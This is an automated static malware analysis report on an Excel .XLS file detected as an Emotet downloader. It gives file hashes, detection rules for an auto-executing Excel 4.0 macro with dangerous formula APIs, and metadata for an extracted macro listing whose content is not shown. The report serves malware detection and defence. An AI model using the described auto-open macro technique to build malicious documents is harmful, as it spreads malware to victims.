Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 c283869d07cbb37a…

MALICIOUS

Office (OLE) / .XLS

Size: 216.5 KB
Created: 2015-06-05 18:19:34
Authoring application: Microsoft Excel
First seen: 2026-06-16
MD5: 2aaf3c4e966e508931b1479d98578abd
SHA-1: df424378c0bcd742055f529128de7bceefb9dc5a
SHA-256: c283869d07cbb37a68042d209520bce57f1e450808babf661f62db8c90d7ce9f
Risk score: 200

Heuristics 4

  • ClamAV: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0
  • Excel 4.0 Auto_Open defined name (severity: critical; rule: OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs (severity: critical; rule: OLE_XLM_DANGEROUS_FN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present (severity: medium; rule: OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 8189 bytes
SHA-256: 1c4ca3ac7a958ad30d20e2cbe71ce64d8944a312564cef26f4a1a0bcd74ec445
Preview script
First 1,000 lines of the extracted script